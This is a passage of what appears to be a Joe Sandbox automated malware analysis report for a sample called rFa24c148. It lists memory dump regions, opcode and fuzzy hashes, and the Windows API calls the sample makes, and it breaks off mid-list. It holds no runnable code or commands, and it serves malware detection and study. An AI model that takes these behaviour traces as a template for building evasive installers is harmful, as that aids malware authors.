                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4fbb970607d7cb35a418217b731136c026a0a3400f799f554838fd04241573db
                                                                                              • Instruction ID: ee6f72ee2f3bb0909599d44b78571c5c57879a322f23376d6d6cd468ba4abdca
                                                                                              • Opcode Fuzzy Hash: 4fbb970607d7cb35a418217b731136c026a0a3400f799f554838fd04241573db
                                                                                              • Instruction Fuzzy Hash: 74D1AF78E002188FEB54DFA5C994B9DBBB2EF89300F5080A9D509BB364DB355A85CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 15f74bff959b18662cc9396c36849ece9d27944167b1aad156c0a6e8785fc2e1
                                                                                              • Instruction ID: 713fb6766137810c32a69c0a9c3c1ee774b74d110356de2a7d15067053951517
                                                                                              • Opcode Fuzzy Hash: 15f74bff959b18662cc9396c36849ece9d27944167b1aad156c0a6e8785fc2e1
                                                                                              • Instruction Fuzzy Hash: C4D1CE78E01228CFEB14CFA5C994B9DBBB2EF89300F5080A9D509AB364DB355D86CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a0a37051f4e029137cac6e2989168e0ab750d4e20134b06ca924ddc6f09b909e
                                                                                              • Instruction ID: d1378a834051beefdf43181490c8abfd7b92af1ddc2d47c2477f9992d7f5916e
                                                                                              • Opcode Fuzzy Hash: a0a37051f4e029137cac6e2989168e0ab750d4e20134b06ca924ddc6f09b909e
                                                                                              • Instruction Fuzzy Hash: BBC1CF74E01218CFEB14CFA5C984B9DBBB2EF89300F6080AAD509AB364DB355E85CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 01c6409ab5ad80b58cadd67058e1c1074a51a99813aef05e4f2639891984e54d
                                                                                              • Instruction ID: cfdc5cdeef857bb38feb679a99e9e5e051bbf91b7dace9083b0d9deb29d15171
                                                                                              • Opcode Fuzzy Hash: 01c6409ab5ad80b58cadd67058e1c1074a51a99813aef05e4f2639891984e54d
                                                                                              • Instruction Fuzzy Hash: 78C1C074E01218CFEB14DFA5C984B9DBBB2EF89300F2080AAD409AB365DB355E85CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 11739fbb27b9daba30d27d0597666030dd651830222f7a85a15ea7a7144b66d3
                                                                                              • Instruction ID: 895d6e25609cf28bb81d21297b264390e2a8e3f67ca4c699fbefa7596bf9a2d2
                                                                                              • Opcode Fuzzy Hash: 11739fbb27b9daba30d27d0597666030dd651830222f7a85a15ea7a7144b66d3
                                                                                              • Instruction Fuzzy Hash: D1C1BE74E01218CFEB14DFA5C984B9DBBB2BF89300F2080AAD509AB365DB355A85CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7963abc136c88562a2f52a1eb112af0feca054e2b9ac60457ec9e60e1c940d08
                                                                                              • Instruction ID: 03434003d3e02a706238a0c254ee7243272f668081efe4edb3e73426681cd02a
                                                                                              • Opcode Fuzzy Hash: 7963abc136c88562a2f52a1eb112af0feca054e2b9ac60457ec9e60e1c940d08
                                                                                              • Instruction Fuzzy Hash: 29C1B074E01218CFEB14DFA5C944B9DBBB2EF89300F2080AAD509AB365DB359A85CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 23c7d4db4e62cf28ea34a12940294b4cca375f5f174dabb539ea45e2b1409311
                                                                                              • Instruction ID: d63fd3996d1ff48afd98d3844bf2f48b1908c3c5700406087a8f4d5d1075d4be
                                                                                              • Opcode Fuzzy Hash: 23c7d4db4e62cf28ea34a12940294b4cca375f5f174dabb539ea45e2b1409311
                                                                                              • Instruction Fuzzy Hash: 2FC1B074E01218CFEB14DFA5C944B9DBBB2EF89300F2080AAD409AB365DB359E85CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b7f4de2c8e5e106b34e8da69e26f3d9869cfac1c7d2d39151947d562835db6a4
                                                                                              • Instruction ID: 352a9ff0531e6bb1a34eef37b2885cb8fafb86bed245a85bf4a558b6b58cfe96
                                                                                              • Opcode Fuzzy Hash: b7f4de2c8e5e106b34e8da69e26f3d9869cfac1c7d2d39151947d562835db6a4
                                                                                              • Instruction Fuzzy Hash: 21C1BF74E01218CFEB14DFA5C984B9DBBB2EF89300F6080AAD509AB365DB355E85CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1e2297687b83a8d91b57d270163884e0f96fe14a1abcda87f019f250cae0488d
                                                                                              • Instruction ID: 31f79e1c9e7fbccfaa8b5e324d13193ad3d6fcc2c73e2f9868899480521b13e8
                                                                                              • Opcode Fuzzy Hash: 1e2297687b83a8d91b57d270163884e0f96fe14a1abcda87f019f250cae0488d
                                                                                              • Instruction Fuzzy Hash: 79C1B074E01218CFEB14DFA5C954B9DBBB2EF89300F2080AAD909AB365DB355E85CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d7c8fece54904f5dfd1268acc02acf0c5ebc3c5efd3f425b0c3929b5b4cdcc6a
                                                                                              • Instruction ID: 7286faead62694f867fb0f6d25e629ec18fcae628afed0c78a97859efb8b7b83
                                                                                              • Opcode Fuzzy Hash: d7c8fece54904f5dfd1268acc02acf0c5ebc3c5efd3f425b0c3929b5b4cdcc6a
                                                                                              • Instruction Fuzzy Hash: 4EC1D074E01218CFEB14DFA5C984B9DBBB2EF89300F2081AAD409AB364DB355E85CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e7bebe8048e5729bca093a4cd7fde9b51dda1b26ad7033c9f9853152915c15e8
                                                                                              • Instruction ID: 2ef08426aa9e6b335266e176245debd5e243296fdcb843cf5a177fc9d6a7110e
                                                                                              • Opcode Fuzzy Hash: e7bebe8048e5729bca093a4cd7fde9b51dda1b26ad7033c9f9853152915c15e8
                                                                                              • Instruction Fuzzy Hash: 46C1BF74E01218CFEB14DFA5C994B9DBBB2EF89300F2080AAD409AB365DB355E85CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 35c2e504ebef26e748fb25262d89f570b79ce586c3c1df86ae6a3f297600ad0e
                                                                                              • Instruction ID: f4d9cf99ea3aa82f80d614ddb18d4bb8cf4d7df5e5200614a6092b5bc3fe3fcc
                                                                                              • Opcode Fuzzy Hash: 35c2e504ebef26e748fb25262d89f570b79ce586c3c1df86ae6a3f297600ad0e
                                                                                              • Instruction Fuzzy Hash: 06C1CF74E01218CFEB14CFA5C994B9DBBB2FF89300F2081AAD409AB365DB355A85CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 61a67217830b0a33aae4fa1064fc387248052fff99418ef8e9492c57775c31d0
                                                                                              • Instruction ID: 46f7c4054c57cf50d2e555916fcb42bd8ea900caad9ec97f406a8e94cb87e61c
                                                                                              • Opcode Fuzzy Hash: 61a67217830b0a33aae4fa1064fc387248052fff99418ef8e9492c57775c31d0
                                                                                              • Instruction Fuzzy Hash: 4BC1C074E01218CFEB14DFA5C984B9DBBB2EF89300F2081AAD409AB365DB355E85CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: df8d6314473549f5d1f6e8c536c364ff36107282413b3af83c8191cb9e45dab8
                                                                                              • Instruction ID: 64cf7385d7a24a6663fb23ed9411c5d3699bf259bdbb2d5a12fa97dd2cfd5829
                                                                                              • Opcode Fuzzy Hash: df8d6314473549f5d1f6e8c536c364ff36107282413b3af83c8191cb9e45dab8
                                                                                              • Instruction Fuzzy Hash: 7EC1A074E01218CFEB14DFA5C994B9DBBB2EF89300F6080AAD409AB365DB355E85CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 777e6541a0ee91023419630141d10bb0a19070562584c47311415c1b1e236678
                                                                                              • Instruction ID: f2accde2c8359a985e9f0ee9ebfd358dcf4c2950da7d87e0788b5d5df6a16518
                                                                                              • Opcode Fuzzy Hash: 777e6541a0ee91023419630141d10bb0a19070562584c47311415c1b1e236678
                                                                                              • Instruction Fuzzy Hash: E2C19F74E01218CFDB14DFA5C994B9DBBB2EF89301F2080A9D809AB365DB355E86CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996509899.0000000036830000.00000040.00000800.00020000.00000000.sdmp, Offset: 36830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36830000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6c6461fd950fb5ad7ad873fe9de8546a62630e4351789c00dd594cf701bb1e00
                                                                                              • Instruction ID: cf3c56af3e0adc3a7dcd0a4739cb687bbceb4c6e422081c85f81779283d48df5
                                                                                              • Opcode Fuzzy Hash: 6c6461fd950fb5ad7ad873fe9de8546a62630e4351789c00dd594cf701bb1e00
                                                                                              • Instruction Fuzzy Hash: F0B16474E11218CFDB54DFA9C894A9DBBF2FF89311F2081A9D819AB365DB30A941CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996509899.0000000036830000.00000040.00000800.00020000.00000000.sdmp, Offset: 36830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36830000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3a7134ea4434c797aeae747c6ad4c4fa1f4139f1e30ea31ecdd8a076740269c7
                                                                                              • Instruction ID: 1aba190f2034458607596d7b928a61cb6d4bfd066ea2b807e83b22bd5cff2ae6
                                                                                              • Opcode Fuzzy Hash: 3a7134ea4434c797aeae747c6ad4c4fa1f4139f1e30ea31ecdd8a076740269c7
                                                                                              • Instruction Fuzzy Hash: 227117B8E012488FDB58CFB9C88499DBBF2FF89310F2481A9D495AB365D7309942CF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996509899.0000000036830000.00000040.00000800.00020000.00000000.sdmp, Offset: 36830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36830000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a63ffbd0badae7025c1d3273fe6076a729bbe708ec2cc980fc09b78d652c55bb
                                                                                              • Instruction ID: e52e8caf668a429adee070f316dea0def96da3f0664dcfb8503a1f93a1b1fde8
                                                                                              • Opcode Fuzzy Hash: a63ffbd0badae7025c1d3273fe6076a729bbe708ec2cc980fc09b78d652c55bb
                                                                                              • Instruction Fuzzy Hash: 0F71F7B8E016488FDB58CFB9C884A9DBBF2FF89310F248169D495AB365D7309942CF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6be93c3665f8d542d2e20e06d29466537f95eeb9cabcae943958c08bbc8a7474
                                                                                              • Instruction ID: 2a10cd4b2759a6a76071ae15f6f9ad0fb54c403d1e967663f59139ba7d0a2a10
                                                                                              • Opcode Fuzzy Hash: 6be93c3665f8d542d2e20e06d29466537f95eeb9cabcae943958c08bbc8a7474
                                                                                              • Instruction Fuzzy Hash: 07512770E02208CBDB04DFA9D9557EEBBB2FB89300F24D129D404BB294DB759892CF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c0ad598f7cdffe6c489453285446a29b1ae5ba24e1e0dd58bbce88d95a762a44
                                                                                              • Instruction ID: 72df4d8c5fdedea719138fb66e7fcf28f0fcbc0ed9c996384160f385e9300194
                                                                                              • Opcode Fuzzy Hash: c0ad598f7cdffe6c489453285446a29b1ae5ba24e1e0dd58bbce88d95a762a44
                                                                                              • Instruction Fuzzy Hash: BD51F270E06218CBDB04DFA8E9957AEBBB2FB49300F209129D415BB694DB359892CF54
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004051BF
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004051CE
                                                                                              • GetClientRect.USER32(?,?), ref: 0040520B
                                                                                              • GetSystemMetrics.USER32(00000015), ref: 00405213
                                                                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405234
                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405245
                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405258
                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405266
                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405279
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040529B
                                                                                              • ShowWindow.USER32(?,00000008), ref: 004052AF
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004052D0
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004052E0
                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052F9
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405305
                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 004051DD
                                                                                                • Part of subcall function 00403FF1: SendMessageW.USER32(00000028,?,00000001,00403E1D), ref: 00403FFF
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405322
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000050F4,00000000), ref: 00405330
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405337
                                                                                              • ShowWindow.USER32(00000000), ref: 0040535B
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405360
                                                                                              • ShowWindow.USER32(00000008), ref: 004053AA
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053DE
                                                                                              • CreatePopupMenu.USER32 ref: 004053EF
                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405403
                                                                                              • GetWindowRect.USER32(?,?), ref: 00405423
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040543C
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405474
                                                                                              • OpenClipboard.USER32(00000000), ref: 00405484
                                                                                              • EmptyClipboard.USER32 ref: 0040548A
                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405496
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004054A0
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004054B4
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004054D4
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004054DF
                                                                                              • CloseClipboard.USER32 ref: 004054E5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                              • String ID: {
                                                                                              • API String ID: 590372296-366298937
                                                                                              • Opcode ID: 45a22419854ef496da6d8936d9b7bf7694c075be71a1eb13d6de5557fdea4b02
                                                                                              • Instruction ID: 0991f248181b02e880a99382a637b1aa596eb82eb2a2f586ae382473c4d6dcb0
                                                                                              • Opcode Fuzzy Hash: 45a22419854ef496da6d8936d9b7bf7694c075be71a1eb13d6de5557fdea4b02
                                                                                              • Instruction Fuzzy Hash: 9CB15970900209FFEB219F60DD89AAE7B79FB04355F00807AFA01BA1A0C7755E52DF69
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B20
                                                                                              • ShowWindow.USER32(?), ref: 00403B3D
                                                                                              • DestroyWindow.USER32 ref: 00403B51
                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403B6D
                                                                                              • GetDlgItem.USER32(?,?), ref: 00403B8E
                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403BA2
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403BA9
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403C57
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403C61
                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403C7B
                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403CCC
                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403D72
                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403D93
                                                                                              • EnableWindow.USER32(?,?), ref: 00403DA5
                                                                                              • EnableWindow.USER32(?,?), ref: 00403DC0
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DD6
                                                                                              • EnableMenuItem.USER32(00000000), ref: 00403DDD
                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403DF5
                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403E08
                                                                                              • lstrlenW.KERNEL32(00422698,?,00422698,004281A0), ref: 00403E31
                                                                                              • SetWindowTextW.USER32(?,00422698), ref: 00403E45
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00403F79
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 184305955-0
                                                                                              • Opcode ID: b883d8f4190a66d351c5eadddd01b1b9d646dcf61297c4c4bd8721fadccfd406
                                                                                              • Instruction ID: d7c36ab4ba1e77d3c514d2e075e7bf05f8385f4f0eed445bed2eaaef7d4a98f3
                                                                                              • Opcode Fuzzy Hash: b883d8f4190a66d351c5eadddd01b1b9d646dcf61297c4c4bd8721fadccfd406
                                                                                              • Instruction Fuzzy Hash: 71C1AE71A04205ABEB216F61ED45D3B7A7CFB49306F40053EF501B11E1CB79A952DB2E
                                                                                              APIs
                                                                                                • Part of subcall function 004060E1: GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000008), ref: 004060F3
                                                                                                • Part of subcall function 004060E1: LoadLibraryA.KERNEL32(?,?,00000020,00403242,00000008), ref: 004060FE
                                                                                                • Part of subcall function 004060E1: GetProcAddress.KERNEL32(00000000,?), ref: 0040610F
                                                                                              • lstrcatW.KERNEL32(00436000,00422698,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422698,00000000,00000006,00436800,74DF3420,00000000,00434000), ref: 004037C2
                                                                                              • lstrlenW.KERNEL32(00427140,?,?,?,00427140,00000000,00434800,00436000,00422698,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422698,00000000,00000006,00436800), ref: 00403842
                                                                                              • lstrcmpiW.KERNEL32(00427138,.exe,00427140,?,?,?,00427140,00000000,00434800,00436000,00422698,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422698,00000000), ref: 00403855
                                                                                              • GetFileAttributesW.KERNEL32(00427140), ref: 00403860
                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 004038A9
                                                                                                • Part of subcall function 00405CBE: wsprintfW.USER32 ref: 00405CCB
                                                                                              • RegisterClassW.USER32(00428140), ref: 004038E6
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004038FE
                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403933
                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403969
                                                                                              • LoadLibraryW.KERNEL32(RichEd20), ref: 0040397A
                                                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00403985
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00428140), ref: 00403995
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00428140), ref: 004039A2
                                                                                              • RegisterClassW.USER32(00428140), ref: 004039AB
                                                                                              • DialogBoxParamW.USER32(?,00000000,00403AE4,00000000), ref: 004039CA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
